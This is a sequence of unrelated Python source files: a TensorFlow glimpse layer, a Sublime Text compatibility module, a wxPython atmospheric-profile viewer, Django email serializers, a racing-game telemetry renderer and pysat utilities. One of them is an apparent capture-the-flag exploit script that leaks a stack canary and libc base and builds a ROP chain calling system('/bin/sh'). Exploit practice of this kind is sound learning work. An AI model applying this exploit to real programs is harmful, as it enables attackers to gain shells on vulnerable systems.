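    `scale`) around the given offsets with tf.image.extract_glimpse, average-pools
    the coarser scales back to the base glimpse resolution, and stacks the scales
    into a single output tensor."""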
def __init__(self, size, depth, scale, trainable=True, data_format='NHWC', input_shape=None, input_dtype=None,
batch_size=None, name=None):
if isinstance(size, (list, tuple)):
self._height, self._width = size
else:
self._height = self._width = size
self._depth = depth
self._scale = scale
height = self._height
width = self._width
self._sizes = [np.array([height, width])]
for _ in range(1, self._depth):
height *= self._scale
width *= self._scale
self._sizes.append(np.array([height, width]))
if data_format not in {'NCHW', 'NHWC'}:
raise Exception('Invalid data format for SpatialGlimpse: {}'.format(data_format))
self._data_format = data_format
super(SpatialGlimpse, self).__init__(trainable, name, input_shape=[input_shape, (2,)],
input_dtype=input_dtype, batch_size=batch_size)
def _call(self, inputs):
super(SpatialGlimpse, self)._call(inputs)
if not isinstance(inputs, list):
raise Exception('SpatialGlimpse takes exactly two inputs')
offsets = inputs[1]
inputs = inputs[0]
output = []
for d in range(self._depth):
o = tf.image.extract_glimpse(inputs, tf.constant(self._sizes[d], dtype=tf.int32, shape=[2]), offsets)
if d > 0:
kernel_size = self._sizes[d] / self._sizes[0]
assert (np.any(kernel_size % 2) == 0.)
o = tf.nn.avg_pool(o,
ksize=[1, kernel_size[0], kernel_size[1], 1],
strides=[1, kernel_size[0], kernel_size[1], 1],
padding='VALID')
output.append(o)
input_shape = tf_int_shape(inputs)
batch_size = (-1,) if input_shape[0] is None else (input_shape[0],)
output_shape = batch_size + (self._height, self._width) + (self._depth,)
return tf.reshape(tf.pack(output, axis=4), shape=output_shape)
def _get_output_shape(self, input_shape):
"""Computes the output shape of the layer given an input shape.
This function assumes that the layer will be built to match the input shape.
Parameters
----------
input_shape: tuple[int] or list[tuple[int]]
The input shape(s) for the layer. Shape tuples can include
None for free dimensions, instead of integer.
"""
input_shape = input_shape[0]
return (input_shape[0],) + (self._height, self._width) + (input_shape[3] * self._depth,)
|
# (emacs/sublime) -*- mode:python; coding: utf-8-unix; tab-width: 4; st-trim_trailing_white_space_on_save: true; st-ensure_newline_at_eof_on_save: true; -*-
# sublime version compatibility layer
# * backports ST3 API to ST2
from __future__ import absolute_import, division, print_function, unicode_literals
# from __future__ import absolute_import, division, print_function
# print( "__name__ = %s" % __name__ )
# print( "__package__ = %s" % __package__ )
# import sublime
from sublime import *
import inspect
import os
from . import logging
log = logging.getLogger( __name__ )
# log.study( "__name__ = %s", __name__ )
# log.study( "__package__ = %s", __package__ )
# log.study( "cwd = %s", os.getcwd() )
# determine current Sublime Text version
# NOTE: # early versions of ST3 might return ''
# _st_version_n = int(sublime.version()) if sublime.version() else 3000
_st_version_n = int( version() ) if version() else 3000
# log.debug( "_st_version_n = %s", _st_version_n )
# initial CWD (needed for ST2 to correctly determine package information)
_package_cwd = os.getcwd()
# log.debug( "_package_cwd = %s", _package_cwd )
###
_version = version
def version ( ):
# log.debug( ".begin" )
v = _version()
if not v: v = '3000'
assert v == str( _st_version_n )
return v
def version_n ( ):
# log.debug( ".begin" )
v_n = int( version() )
assert v_n == _st_version_n
return v_n
###
def package_name ( ):
# log.debug( ".begin" )
st_vn = version_n()
if st_vn >= 3000:
name = __name__.split('.')[0]
else:
# ST2
name = os.path.basename( _package_cwd )
return name
_package_name = package_name()
###
def sublime_pathform ( path ):
# log.debug( ".begin" )
# ST (as of build 2181) requires *NIX/MSYS style paths (using '/') in several areas (eg, for the 'syntax' view setting)
return path.replace( "\\", "/" )
###
# NOTES
# dir == ST/*NIX-form relative directories
# path == OS-form absolute paths
def installed_packages_dir ( ):
# log.debug( ".begin" )
return 'Installed Packages'
_installed_packages_path = installed_packages_path
def installed_packages_path ( ):
# log.debug( ".begin" )
return _installed_packages_path()
def installed_package_path ( package_name=_package_name ):
return os.path.join( installed_packages_path(), package_name+'.sublime-package' )
def packages_dir ( ):
# log.debug( ".begin" )
return 'Packages'
_packages_path = packages_path
def packages_path ( ):
# log.debug( ".begin" )
return _packages_path()
def package_dir ( package_name=_package_name ):
# log.debug( ".begin" )
return sublime_pathform( os.path.join( packages_dir(), package_name ) )
def package_path ( package_name=_package_name ):
# log.debug( ".begin" )
return os.path.join( packages_path(), package_name )
###
try: _find_resources = find_resources
except NameError:
_find_resources = None
def find_resources ( fnmatch_pattern ):
# log.debug( ".begin" )
import fnmatch
import os
# if hasattr(sublime, 'find_resources'):
if _find_resources is not None:
for f in _find_resources( fnmatch_pattern ):
yield f
else:
# ST2
for root, dirs, files in os.walk( _packages_path() ):
for f in files:
if fnmatch.fnmatch( f, fnmatch_pattern ):
langfile = os.path.relpath( os.path.join(root, f), _packages_path() )
yield sublime_pathform( os.path.join( packages_dir(), langfile ) )
###
_DEFAULT_MAX_CACHE_TIME = 600 # 600 sec == 10 min
_resource_cache = []
_resource_cache_timestamp = 0
def _get_resources ( max_cache_time=_DEFAULT_MAX_CACHE_TIME ):
# log.debug( ".begin" )
import time
now = time.time()
global _resource_cache
global _resource_cache_timestamp
if (( now - _resource_cache_timestamp ) > max_cache_time ):
# info( "cache expired; re-reading all resources" )
_resource_cache = list ( find_resources( '*' ) )
_resource_cache_timestamp = now
# log.notice( "len(_resource_cache) = %d", len(_resource_cache) )
return _resource_cache
def find_package_resources ( fnmatch_pattern, package_name=_package_name, max_cache_time=_DEFAULT_MAX_CACHE_TIME ):
# log.debug( ".begin" )
import fnmatch, os
files = _get_resources( max_cache_time )
prefix = sublime_pathform( os.path.join( packages_dir(), package_name ) )
# log.info( "prefix = '%s'", prefix )
for f in files:
if f.startswith( prefix ):
if fnmatch.fnmatch( f, fnmatch_pattern ):
yield f
def find_resources_regex ( regex_pattern, max_cache_time=_DEFAULT_MAX_CACHE_TIME ):
# log.debug( ".begin" )
import re
files = _get_resources( max_cache_time )
regex = re.compile( regex_pattern )
for f in files:
if regex.match(f):
yield f
###
try: _load_resource = load_resource
except NameError:
_load_resource = None
def load_resource ( path ):
# log.debug( ".begin" )
if _load_resource is not None:
return _load_resource( path )
else:
# ST2
resource_path = os.path.join( os.path.dirname( _installed_packages_path() ), path )
with open( resource_path ) as file:
resource = file.read()
return resource
try: _load_binary_resource = load_binary_resource
except NameError:
    _load_binary_resource = None
def load_binary_resource ( path ):
# log.debug( ".begin" )
if _load_binary_resource is not None:
return _load_binary_resource( path )
else:
# ST2
resource_path = os.path.join( os.path.dirname( _installed_packages_path() ), path )
with open( resource_path, mode='rb' ) as file:
resource = file.read()
return resource
def resource_abstract_path ( path ):
# path of file or .sublime-package which holds the resource content
# log.debug( ".begin" )
pass
def is_resource_accessible ( path ):
# log.debug( ".begin" )
pass
###
def load_base_settings ( ):
st_vn = version_n()
if st_vn >= 2174:
settings_base = load_settings('Preferences.sublime-settings')
else:
settings_base = load_settings('Base File.sublime-settings')
return settings_base
|
from ptrlib import *
import math
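# search(x) approximates x as a product of small factors: values up to 255*255 are
# matched by the closest product of two factors in [1, 255]; larger values are
# handled recursively through sqrt(x), doubling each factor's exponent.  product(l)
# rebuilds the integer from that {factor: exponent} map.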
def search(x):
if x <= 255 * 255:
lx = ly = 1
for x1 in range(1, 0x100):
for x2 in range(1, 0x100):
if abs(x - x1 * x2) < abs(x - lx * ly):
lx, ly = x1, x2
return {lx: 1, ly: 1}
l = search(math.sqrt(x))
for key in l:
l[key] *= 2
return l
def product(l):
y = 1
for w in l:
y *= w ** l[w]
return y
libc = ELF("./libc-2.27.so")
sock = Process("./multiplier")
sock.recvline()
# leak canary
sock.recvline()
for i in range(25):
sock.sendline("255")
sock.sendline("0")
canary = bytes.fromhex(bytes2str(sock.recvline().rstrip()[:-0x18 * 2]))
canary = u64(b'\x00' + canary[::-1][1:])
dump("canary = " + hex(canary))
# leak libc base
sock.recvline()
for i in range(41):
sock.sendline("255")
sock.sendline("0")
addr_retaddr = bytes.fromhex(bytes2str(sock.recvline().rstrip()[:-0x28 * 2]))
addr_retaddr = u64(addr_retaddr[::-1])
libc_base = (addr_retaddr - libc.symbol("__libc_start_main")) & 0xfffffffffffff000
dump("libc base = " + hex(libc_base))
# overwrite return address
rop_pop_rdi = 0x0002155f
payload = 0
payload = (payload | (libc_base + libc.symbol("system"))) << 64
payload = (payload | (libc_base + next(libc.find("/bin/sh")))) << 64
payload = (payload | (libc_base + rop_pop_rdi)) << 64
payload = (payload | canary) << (64 + 0x10 * 8)
print(hex(payload))
while payload > 0:
l = search(payload)
y = product(l)
print("-----")
print(hex(payload))
print(hex(y))
mask = 0
for i in range(len(hex(payload)[2:]) // 2 - 1):
mask <<= 8
mask |= 0xff
payload &= mask
|
# -*- coding: utf-8 -*-
import wx
import rmodel
import h5py
import rttov
import util
from rview import layeritem
import locale
import numpy
import matplotlib
import sys
import copy
import logging
from profileframeutils import GenericPlotItemPanel, MyNotebook
from profileframeutils import kindOfItem, PlotItemPanelAll
locale.setlocale(locale.LC_ALL, '')
class PlotItemPanel(GenericPlotItemPanel):
""" plot on a PlotPanel one curve """
def __init__(self, parent, value, pression, theName, liste_item=None,
kind="GASES", xlegend="(mw/cm-1/ster/sq.m)/ppmv",
layerstyle=False, layer=None, yInPressions=True, tskin=None):
edit = False
GenericPlotItemPanel.__init__(self, parent, value, pression, theName,
liste_item, kind, xlegend,
edit, layerstyle, layer, yInPressions,
tskin)
self.SetTickSize(8)
class KProfileView (util.GenericViewRadio):
""" Profile window of the application """
helpTitle = "Help Profile"
helpMessage = """
Select and visualize a component profile on the right panel
Click left button to modify the profile.
Click left and drag a zone to zoom in.
Click right button to zoom out.
Apply your changes or save the profile
for the next run of RTTOV.
"""
def __init__(self, parent, profile, channel=1, baseProfile=None,
edit=False, yInPressions=True, runNumber=1):
self.edit = edit
logging.debug("profile" + str(profile['T'].shape))
logging.debug("baseProfile" + str(baseProfile['T'].shape))
self.myProfile = copy.deepcopy(profile)
self.yInPressions = yInPressions
if baseProfile is not None:
self.myProfile['P'] = baseProfile['P']
self._ComputeLayers(self.myProfile['P'])
else:
self.yInPressions = False
self.my_list_cloud = []
for layeritem in self.myProfile.cloud_list:
self.my_list_cloud.append(layeritem)
self.my_list_cloud.append("CFRAC")
self.my_list_cloud.append("CLW")
util.GenericView.__init__(self, parent, "PROFILE")
sizer = wx.BoxSizer(wx.HORIZONTAL)
self.SetSizer(sizer)
self.CreateMenuBar()
if baseProfile is not None:
self.items["ypressions"].Enable(True)
self.items["ypressions"].Check(True)
self.items["ylevels"].Check(False)
else:
self.items["ypressions"].Enable(False)
self.items["ypressions"].Check(False)
self.items["ylevels"].Check(True)
self.SetSize((1450, 700))
self.SetMinSize((1300, 700))
self.SetTitle("run %d k profile channel %d" % (runNumber, channel))
# panel 1 notebook with all curves (GASES, AEROSOLS, CLOUDS)
self.panel1 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
self.panel1.SetSize((200, 500))
sizer.Add(self.panel1, 1, wx.EXPAND)
# creation of notebook for the panel 1
self.nb_all = MyNotebook(self.panel1, isRightPage=False)
sizer1 = wx.BoxSizer()
sizer1.Add(self.nb_all, 1, wx.EXPAND)
self.panel1.SetSizer(sizer1)
# panel 2 notebook with one curve
self.panel2 = wx.Panel(self, -1, style=wx.BORDER_SIMPLE)
sizer.Add(self.panel2, 1, wx.EXPAND)
# creation of the notebook for the panel 2
self.nb = MyNotebook(self.panel2)
self.axesDef = []
        # create the plot pages
self.Plot(self.myProfile)
# create a second sizer for the notebook
sizer2 = wx.BoxSizer()
sizer2.Add(self.nb, 1, wx.EXPAND)
self.panel2.SetSizer(sizer2)
self.sb = self.CreateStatusBar()
self.sb.SetBackgroundColour('WHITE')
txt = ''
self.sb.SetStatusText(txt)
self.Centre()
self.Show(True)
def PlotLeft(self, profile=None):
# plot panel 1 with all gas
self.allGraphicsPages = {}
self.allGraphicsPages['GASES'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
kind='GASES',
xlegendT=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
yInPressions=self.yInPressions,
addTskin=True)
self.allGraphicsPages['GASES'].SetTickSize(8)
self.nb_all.AddPage(self.allGraphicsPages['GASES'], 'GASES')
if self.myProfile.anyAerosol():
self.allGraphicsPages['AEROSOLS'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
kind="AEROSOLS",
layer=self.layer,
xlegendT=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
yInPressions=(
self.yInPressions))
self.allGraphicsPages['AEROSOLS'].SetTickSize(8)
self.nb_all.AddPage(self.allGraphicsPages['AEROSOLS'], 'AEROSOLS')
if self.myProfile.anyCloud():
self.allGraphicsPages['CLOUDS'] = PlotItemPanelAll(
self.nb_all,
self.myProfile,
xlegendT=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
kind="CLOUDS",
layer=self.layer,
yInPressions=self.yInPressions)
self.allGraphicsPages['CLOUDS'].SetTickSize(8)
self.nb_all.AddPage(self.allGraphicsPages['CLOUDS'], 'CLOUDS')
def Plot(self, profile=None):
if profile is not None:
self.myProfile = profile
self._ComputeLayers(self.myProfile['P'])
self.graphicPages = {}
self.graphicPages['T'] = PlotItemPanel(self.nb,
self.myProfile['T'],
self.myProfile['P'],
theName='T',
xlegend=self.myProfile[
'T_ATTRIBUTE']['UNITS'],
yInPressions=self.yInPressions,
tskin=self.myProfile[
'SKIN']['T'])
self.nb.AddPage(self.graphicPages['T'], 'T')
for gas in self.myProfile.gas_list:
if self.myProfile[gas] is not None:
self.graphicPages[gas] = PlotItemPanel(self.nb,
self.myProfile[gas],
self.myProfile['P'],
theName=gas,
xlegend=self.myProfile[
gas + '_ATTRIBUTE'][
'UNITS'],
yInPressions=(
self.yInPressions))
self.nb.AddPage(self.graphicPages[gas], gas)
if self.myProfile.anyAerosol():
for aerosol in self.myProfile.aerosol_list:
if self.myProfile[aerosol] is not None:
self.graphicPages[aerosol] = PlotItemPanel(
self.nb,
self.myProfile[aerosol],
self.myProfile['P'],
theName=aerosol,
kind="AEROSOLS",
xlegend=self.myProfile[
aerosol + '_ATTRIBUTE'][
'UNITS'],
layer=self.layer,
yInPressions=(
self.yInPressions),
layerstyle=True)
self.nb.AddPage(self.graphicPages[aerosol], aerosol)
if self.myProfile.anyCloud():
for cloud in self.my_list_cloud:
if self.myProfile[cloud] is not None:
if cloud == "CFRAC":
mylegend = "CFRAC"
else:
mylegend = "layer mean content (g/m3)"
self.graphicPages[cloud] = PlotItemPanel(
self.nb,
self.myProfile[cloud],
self.myProfile['P'],
theName=cloud,
kind="CLOUDS",
xlegend=mylegend,
layer=self.layer,
yInPressions=(
self.yInPressions),
layerstyle=True)
self.nb.AddPage(self.graphicPages[cloud], cloud)
# delete empty graphicPages
for key in self.graphicPages.keys():
if self.myProfile[key] is None:
del self.graphicPages[key]
# plot panel 1 with all gas
self.PlotLeft()
def _ComputeLayers(self, pression):
""" Compute the mean value of pression in a layer """
foo = numpy.empty(pression.shape[0] - 1)
for i in range(foo.shape[0]):
foo[i] = (pression[i + 1] + pression[i]) / 2
self.layer = foo
def _MakeBinding(self):
""" set the trivial Binding for the View """
# binding cancel button
def RePlotAll(self, profile=None):
""" Plot the 2 panels with (new) profile
(delete everything before redraw) """
if profile is not None:
self.myProfile = profile
self._ComputeLayers(self.myProfile['P'])
# remove all pages of the notebook
self.nb.DeleteAllPages()
self.nb_all.DeleteAllPages()
self.Plot()
def RePlotAllLeftPanel(self, profile=None):
""" Plot the 2 panels with (new) profile
(delete everything before redraw) """
if profile is not None:
self.myProfile = profile
self._ComputeLayers(self.myProfile['P'])
# remove all pages of the notebook
self.nb_all.DeleteAllPages()
self.PlotLeft()
def addRightPage(self, item):
""" add an new item page """
kind = kindOfItem[item]
if kind == "GASES":
myY = self.myProfile['P']
else:
myY = self.layer
self.graphicPages[item] = PlotItemPanel(self.nb, self.myProfile[item],
self.myProfile['P'],
theName=item, kind=kind,
xlegend=self.myProfile[
item + '_ATTRIBUTE'][
'UNITS'],
layer=myY,
                                                yInPressions=self.yInPressions)
self.nb.AddPage(self.graphicPages[item], item)
if kind == "CLOUDS":
if 'CFRAC' not in self.graphicPages:
item = 'CFRAC'
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item],
self.myProfile['P'], theName=item,
kind=kind, xlegend="CFRAC",
layer=myY,
                    yInPressions=self.yInPressions)
self.nb.AddPage(self.graphicPages[item], item)
if 'CLW' not in self.graphicPages and self.myProfile[
'CLW'] is not None:
item = "CLW"
self.graphicPages[item] = PlotItemPanel(
self.nb, self.myProfile[item],
self.myProfile['P'], theName=item,
kind=kind, xlegend="CLW",
layer=myY,
                    yInPressions=self.yInPressions)
self.nb.AddPage(self.graphicPages[item], item)
def OnClose(self, e):
""" close the surface windows"""
self.Close()
def OnMouseMove(self, e):
""" print x y value of the left plot in the status bar """
pass
def OnYPressions(self, e):
self.yInPressions = True
self.RePlotAll()
def OnYLevels(self, e):
self.yInPressions = False
self.RePlotAll()
def MenuData(self):
""" define the data for the menu
"""
return(("&File", # File Menu
('&Quit', 'Quit', self.OnQuit, "quit", True, False)),
("&Edit", # Edit Menu
("Yaxis in pressure units", "put y in pressure units",
self.OnYPressions, "ypressions", False, True),
("Yaxis in level units", "put y in level unit",
self.OnYLevels, "ylevels", True, True)),
("&Help", # Help Menu
("About", "About screen", self.OnAbout, "about", True, False)))
if __name__ == "__main__":
print "version matplotlib :", matplotlib.__version__
p = rmodel.project.Project()
ex = wx.App()
fh5 = sys.argv[1]
print "f=", fh5
kmat = rttov.kmatrix.Kmatrix()
frad = h5py.File(fh5, 'r')
h5 = frad['/']
kmat.loadh5(h5)
baseProfile = rttov.profile.Profile()
frad.close()
baseProfile = rmodel.project.OpenAProfile(fh5, 1)
profile = kmat.getchanprof(1)
print "tskin", profile['SKIN']['T']
profile.display()
print "T shape", profile['T'].shape
print " NLEVELS : ", profile['NLEVELS']
print profile['NLEVELS']
print "P"
print baseProfile["P"]
print "T"
print profile['T']
print max(profile['T'])
frame = KProfileView(None, profile, channel=1,
yInPressions=True, baseProfile=baseProfile)
frame.Show()
ex.MainLoop()
print "loop"
ex.MainLoop()
# ex.MainLoop()
|
from collections import OrderedDict
from allauth.account.models import EmailAddress, EmailConfirmation
from django.urls import reverse
from rest_framework.validators import UniqueValidator, UniqueTogetherValidator
from rest_framework import serializers
from .serializers import BaseSerializer
__all__ = [
'EmailSerializer',
'EmailVerificationSerializer'
]
class IsVerified(object):
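    """Field validator that rejects updates changing the address of an
    already-verified EmailAddress; set_context exposes the serializer's
    instance and submitted data to the validator."""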
def __call__(self, value):
if self.instance and self.instance.verified:
# This is an Update to a verified address
if self.instance.email != self.data.get('email'):
message = 'Verified email addresses cannot be modified'
raise serializers.ValidationError(message)
def set_context(self, serializer_field):
self.instance = getattr(serializer_field.parent, 'instance', None)
self.data = getattr(serializer_field.parent, 'initial_data', None)
class EmailSerializer(BaseSerializer):
id = serializers.IntegerField(read_only=True)
email = serializers.EmailField(
required=True,
validators=[
UniqueValidator(queryset=EmailAddress.objects.all()),
IsVerified()
]
)
verified = serializers.BooleanField(read_only=True)
primary = serializers.BooleanField(default=False)
class Meta:
model = EmailAddress
fields = (
'url',
'related',
'summary_fields',
'id',
'email',
'verified',
'primary',
'user'
)
validators = [
UniqueTogetherValidator(
queryset=EmailAddress.objects.all(),
fields=('email', 'user', 'primary'),
message="Only one email address can be primary"),
]
def get_url(self, obj):
if obj is None:
return ''
return reverse('api:email_detail', args=(obj.pk,))
def get_related(self, obj):
d = super().get_related(obj)
d['user'] = reverse('api:user_detail', args=(obj.user.pk,))
return d
def get_summary_fields(self, obj):
if obj is None:
return {}
d = super().get_summary_fields(obj)
d['user'] = OrderedDict([
('id', obj.user.id),
('username', obj.user.username)
])
return d
class EmailVerificationSerializer(BaseSerializer):
verified = serializers.SerializerMethodField()
class Meta:
model = EmailConfirmation
fields = (
'email_address',
'verified'
)
def get_verified(self, instance):
return instance.email_address.verified
|
import ac, acsys
import traceback
from math import sin, cos, pi
from colourfader import ColourFader
from moving_average_plotter import MovingAveragePlotter
class TractionCircleView:
FINAL_COLOUR_DATA_POINTS = (0.25, 0.50, 0.10, 1.00)
START_COLOUR_DATA_POINTS = (0.00, 0.75, 0.00, 0.00)
FINAL_COLOUR_MOVING_AVERAGE = (1.00, 1.00, 1.00, 1.00)
START_COLOUR_MOVING_AVERAGE = (0.75, 0.75, 0.75, 0.25)
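    # Scatter points fade from START_COLOUR_DATA_POINTS to FINAL_COLOUR_DATA_POINTS
    # and the moving-average trace from its START to FINAL colour; ColourFader.fade()
    # yields one colour per plotted data point (see render()).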
def __init__(self, window, tractionCircleModel, gPlotter, movingAvgPlotter):
self.scatterSize = 0.04
self.currentSize = 0.10
self.gPlotter = gPlotter
self.tractionCircleModel = tractionCircleModel
self.dataPointsColourFader = ColourFader(self.START_COLOUR_DATA_POINTS, self.FINAL_COLOUR_DATA_POINTS)
self.movingAverageColourFader = ColourFader(self.START_COLOUR_MOVING_AVERAGE, self.FINAL_COLOUR_MOVING_AVERAGE)
self.movingAvgPlotter = movingAvgPlotter
def drawCross(self, radius):
ac.glBegin(1)
ac.glVertex2f(*self.gPlotter.plotG(-radius, 0))
ac.glVertex2f(*self.gPlotter.plotG(+radius, 0))
ac.glEnd()
ac.glBegin(1)
ac.glVertex2f(*self.gPlotter.plotG(0, -radius))
ac.glVertex2f(*self.gPlotter.plotG(0, +radius))
ac.glEnd()
def drawCircumference(self, radius, center):
ac.glBegin(1)
nlines = 24
for i in range(nlines+1):
x, y = self.gPlotter.plotG(center['x'] + (sin(2*pi*i/nlines)*radius), center['z'] + (cos(2*pi*i/nlines)*radius))
ac.glVertex2f(x, y)
ac.glEnd()
def drawCircle(self, radius, center):
ac.glBegin(acsys.GL.Triangles)
prevx, prevy = self.gPlotter.plotG(center['x'], center['z'])
ntriangles = max(4, int(100.*radius))
for i in range(ntriangles+1):
ac.glVertex2f(*self.gPlotter.plotG(center['x'], center['z']))
ac.glVertex2f(prevx, prevy)
x, y = self.gPlotter.plotG(center['x'] + (sin(2*pi*i/ntriangles)*radius), center['z'] + (cos(2*pi*i/ntriangles)*radius))
ac.glVertex2f(x, y)
prevx, prevy = x, y
ac.glEnd()
def drawGrid(self, radius):
ac.glColor4f(0.8, 0.8, 0.8, 0.7)
self.drawCross(radius)
ac.glColor4f(1.0, 1.0, 1.0, 0.9)
self.drawCircumference(radius, {'x':0, 'z':0})
self.drawCircumference(radius/2, {'x':0, 'z':0})
def drawScatterPlot(self, colourFades, dataPoints):
for dataPoint, colour in zip(dataPoints, colourFades):
ac.glColor4f(*colour)
self.drawCircle(self.scatterSize, dataPoint)
ac.glColor3f(1.0, 1.0, 1.0)
def drawLinePlot(self, colourFades, dataPoints):
ac.glBegin(1)
for dataPoint, colour in zip(dataPoints, colourFades):
ac.glColor4f(*colour)
x, y = self.gPlotter.plotG(dataPoint['x'], dataPoint['z'])
ac.glVertex2f(x,y)
ac.glEnd()
def drawPoint(self, radius, dataPoint):
ac.glColor3f(0.2, 1.0, 0.2)
self.drawCircle(radius, dataPoint)
ac.glColor3f(1.0, 1.0, 1.0)
self.drawCircumference(radius, dataPoint)
def render(self):
try:
dataPoints = self.tractionCircleModel.dataPoints()
moving_average = self.movingAvgPlotter.plotMovingAverage(dataPoints)
dataPointsColourFades = self.dataPointsColourFader.fade(len(dataPoints))
movingAverageColourFades = self.movingAverageColourFader.fade(len(dataPoints))
self.drawGrid(self.gPlotter.maxXRange)
self.drawScatterPlot(dataPointsColourFades, dataPoints)
self.drawLinePlot(movingAverageColourFades, moving_average)
if len(moving_average) > 0:
self.drawPoint(self.currentSize, moving_average[-1])
except Exception as e:
ac.log(str(traceback.format_exc()))
|
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import warnings
import xarray as xr
import pysat
def set_data_dir(path=None, store=True):
"""
Set the top level directory pysat uses to look for data and reload.
Parameters
----------
path : string
valid path to directory pysat uses to look for data
store : bool
if True, store data directory for future runs
"""
import os
import sys
import pysat
if sys.version_info[0] >= 3:
from importlib import reload as re_load
else:
re_load = reload
# account for a user prefix in the path, such as ~
path = os.path.expanduser(path)
# account for the presence of $HOME or similar
path = os.path.expandvars(path)
if os.path.isdir(path):
if store:
with open(os.path.join(os.path.expanduser('~'), '.pysat',
'data_path.txt'), 'w') as f:
f.write(path)
pysat.data_dir = path
pysat._files = re_load(pysat._files)
pysat._instrument = re_load(pysat._instrument)
else:
raise ValueError('Path %s does not lead to a valid directory.' % path)
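# Example (hypothetical path): set_data_dir('~/pysat_data') expands the '~',
# checks that the directory exists and, with store=True, persists the choice to
# ~/.pysat/data_path.txt for future sessions.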
def computational_form(data):
"""Deprecated function. Moved to pysat.ssnl.computational_form"""
import warnings
warnings.warn(' '.join(["utils.computational_form is deprecated, use",
"pysat.ssnl.computational_form instead"]),
DeprecationWarning, stacklevel=2)
dslice = pysat.ssnl.computational_form(data)
return dslice
def scale_units(out_unit, in_unit):
""" Determine the scaling factor between two units
Parameters
-------------
out_unit : str
Desired unit after scaling
in_unit : str
Unit to be scaled
Returns
-----------
unit_scale : float
Scaling factor that will convert from in_units to out_units
Notes
-------
Accepted units include degrees ('deg', 'degree', 'degrees'),
radians ('rad', 'radian', 'radians'),
hours ('h', 'hr', 'hrs', 'hour', 'hours'), and lengths ('m', 'km', 'cm').
Can convert between degrees, radians, and hours or different lengths.
Example
-----------
::
import numpy as np
two_pi = 2.0 * np.pi
scale = scale_units("deg", "RAD")
two_pi *= scale
two_pi # will show 360.0
"""
if out_unit == in_unit:
return 1.0
accepted_units = {'deg': ['deg', 'degree', 'degrees'],
'rad': ['rad', 'radian', 'radians'],
                      'h': ['h', 'hr', 'hrs', 'hour', 'hours'],
'm': ['m', 'km', 'cm'],
'm/s': ['m/s', 'cm/s', 'km/s', 'm s$^{-1}$',
'cm s$^{-1}$', 'km s$^{-1}$', 'm s-1', 'cm s-1',
'km s-1']}
replace_str = {'/s': [' s$^{-1}$', ' s-1']}
scales = {'deg': 180.0, 'rad': np.pi, 'h': 12.0,
'm': 1.0, 'km': 0.001, 'cm': 100.0,
'm/s': 1.0, 'cm/s': 100.0, 'km/s': 0.001}
# Test input and determine transformation type
out_key = out_unit.lower()
in_key = in_unit.lower()
for kk in accepted_units.keys():
if out_key in accepted_units.keys() and in_key in accepted_units.keys():
break
if(out_key not in accepted_units.keys() and
out_unit.lower() in accepted_units[kk]):
out_key = kk
if(in_key not in accepted_units.keys() and
in_unit.lower() in accepted_units[kk]):
in_key = kk
if(out_key not in accepted_units.keys() and
in_key not in accepted_units.keys()):
raise ValueError(''.join(['Cannot scale {:s} and '.format(in_unit),
'{:s}, unknown units'.format(out_unit)]))
if out_key not in accepted_units.keys():
raise ValueError('Unknown output unit {:}'.format(out_unit))
if in_key not in accepted_units.keys():
raise ValueError('Unknown input unit {:}'.format(in_unit))
if out_key == 'm' or out_key == 'm/s' or in_key == 'm' or in_key == 'm/s':
if in_key != out_key:
raise ValueError('Cannot scale {:s} and {:s}'.format(out_unit,
in_unit))
# Recast units as keys for the scales dictionary and ensure that
# the format is consistent
rkey = ''
for rr in replace_str.keys():
if out_key.find(rr):
rkey = rr
out_key = out_unit.lower()
in_key = in_unit.lower()
if rkey in replace_str.keys():
for rval in replace_str[rkey]:
out_key = out_key.replace(rval, rkey)
in_key = in_key.replace(rval, rkey)
unit_scale = scales[out_key] / scales[in_key]
return unit_scale
def load_netcdf4(fnames=None, strict_meta=False, file_format=None,
epoch_name='Epoch', units_label='units',
name_label='long_name', notes_label='notes',
desc_label='desc', plot_label='label', axis_label='axis',
scale_label='scale', min_label='value_min',
max_label='value_max', fill_label='fill',
pandas_format=True):
# unix_time=False, **kwargs):
"""Load netCDF-3/4 file produced by pysat.
Parameters
----------
fnames : string or array_like of strings (None)
filenames to load
strict_meta : boolean (False)
check if metadata across fnames is the same
file_format : string (None)
file_format keyword passed to netCDF4 routine
NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4
epoch_name : string ('Epoch')
units_label : string ('units')
keyword for unit information
name_label : string ('long_name')
keyword for informative name label
notes_label : string ('notes')
keyword for file notes
desc_label : string ('desc')
keyword for data descriptions
plot_label : string ('label')
keyword for name to use on plot labels
axis_label : string ('axis')
keyword for axis labels
scale_label : string ('scale')
keyword for plot scaling
min_label : string ('value_min')
keyword for minimum in allowable value range
max_label : string ('value_max')
keyword for maximum in allowable value range
fill_label : string ('fill')
keyword for fill values
Returns
--------
out : pandas.core.frame.DataFrame
DataFrame output
mdata : pysat._meta.Meta
Meta data
"""
import copy
import netCDF4
import pandas as pds
import pysat
try:
basestring
except NameError:
basestring = str
if fnames is None:
raise ValueError("Must supply a filename/list of filenames")
if isinstance(fnames, basestring):
fnames = [fnames]
if file_format is None:
file_format = 'NETCDF4'
else:
file_format = file_format.upper()
saved_mdata = None
running_idx = 0
running_store = []
two_d_keys = []
two_d_dims = []
three_d_keys = []
three_d_dims = []
mdata = pysat.Meta(units_label=units_label,
name_label=name_label,
notes_label=notes_label,
desc_label=desc_label,
plot_label=plot_label,
axis_label=axis_label,
scale_label=scale_label,
min_label=min_label,
max_label=max_label,
fill_label=fill_label)
if pandas_format:
for fname in fnames:
with netCDF4.Dataset(fname, mode='r', format=file_format) as data:
# build up dictionary with all global ncattrs
# and add those attributes to a pysat meta object
ncattrsList = data.ncattrs()
for d in ncattrsList:
if hasattr(mdata, d):
mdata.__setattr__(d+'_', data.getncattr(d))
else:
mdata.__setattr__(d, data.getncattr(d))
loadedVars = {}
for key in data.variables.keys():
# load up metadata. From here group unique
# dimensions and act accordingly, 1D, 2D, 3D
if len(data.variables[key].dimensions) == 1:
if pandas_format:
# load 1D data variable
# assuming basic time dimension
loadedVars[key] = data.variables[key][:]
# load up metadata
meta_dict = {}
for nc_key in data.variables[key].ncattrs():
meta_dict[nc_key] = \
